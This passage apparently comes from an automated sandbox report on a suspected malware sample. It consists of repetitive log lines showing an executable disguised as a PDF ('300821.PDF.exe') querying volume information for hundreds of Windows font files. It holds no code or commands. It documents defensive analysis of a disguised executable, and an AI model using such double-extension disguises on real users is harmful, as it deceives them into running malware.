                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
